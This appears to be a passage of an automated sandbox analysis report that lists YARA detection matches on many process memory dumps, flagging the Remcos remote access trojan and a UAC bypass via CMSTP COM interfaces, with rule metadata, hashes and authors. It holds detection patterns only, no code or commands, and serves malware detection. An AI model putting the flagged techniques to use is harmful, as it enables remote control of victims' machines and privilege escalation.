              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
